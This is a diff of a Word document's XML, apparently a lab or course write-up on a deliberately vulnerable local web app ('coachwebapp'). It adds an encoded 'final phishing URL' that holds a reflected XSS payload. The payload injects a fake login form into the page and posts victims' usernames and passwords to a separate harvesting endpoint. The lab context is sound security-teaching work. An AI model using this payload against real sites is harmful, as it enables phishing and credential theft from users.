+        <w:spacing w:line="120" w:lineRule="auto"/>
+        <w:ind/>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;/form&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
         <w:rPr/>
       </w:pPr>
-      <w:r/>
       <w:r>
-        <w:t xml:space="preserve">The previous stuff was gone because I restarted the server.</w:t>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The encoded</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> final phishing URL</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> with the XSS payload already injected it:</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -2215,528 +3958,86 @@
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
       </w:pPr>
       <w:r/>
       <w:r/>
+      <w:hyperlink r:id="rId39" w:tooltip="http://localhost:8080/02-vul-coachwebapp/workout?studentName=%3Cimg+src%3Dx+style%3D%22display%3Anone%22+onerror%3D%22alert%28%27You+need+to+log+in+immediately%21%27%29%22%3E+%3Ch3%3ELOGIN%3C%2Fh3%3E+%3Cform+action%3D%22http%3A%2F%2Flocalhost%3A8080%2Fharvest-coachweb-springapp%2Fvalidate%22+method%3D%22post%22%3E+%3Clabel+for%3D%22username%22%3EUsername%3A%3C%2Flabel%3E+%3Cinput+type%3D%22text%22+name%3D%22username%22+id%3D%22username%22%2F%3E+%3Clabel+for%3D%22password%22%3EPassword%3A%3C%2Flabel%3E+%3Cinput+type%3D%22password%22+name%3D%22password%22+id%3D%22password%22%2F%3E+%3Cinput+type%3D%22submit%22+value%3D%22OK%22%2F%3E+%3C%2Fform%3E" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="874"/>
+          </w:rPr>
+          <w:t xml:space="preserve">http://localhost:8080/02-vul-coachwebapp/workout?studentName=%3Cimg+src%3Dx+style%3D%22display%3Anone%22+onerror%3D%22alert%28%27You+need+to+log+in+immediately%21%27%29%22%3E+%3Ch3%3ELOGIN%3C%2Fh3%3E+%3Cform+action%3D%22http%3A%2F%2Flocalhost%3A8080%2Fharve</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="874"/>
+          </w:rPr>
+          <w:t xml:space="preserve">st-coachweb-springapp%2Fvalidate%22+method%3D%22post%22%3E+%3Clabel+for%3D%22username%22%3EUsername%3A%3C%2Flabel%3E+%3Cinput+type%3D%22text%22+name%3D%22username%22+id%3D%22username%22%2F%3E+%3Clabel+for%3D%22password%22%3EPassword%3A%3C%2Flabel%3E+%3Cinpu</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="874"/>
+          </w:rPr>
+          <w:t xml:space="preserve">t+type%3D%22password%22+name%3D%22password%22+id%3D%22password%22%2F%3E+%3Cinput+type%3D%22submit%22+value%3D%22OK%22%2F%3E+%3C%2Fform%3E</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="874"/>
+          </w:rPr>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
       <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:footnotePr/>
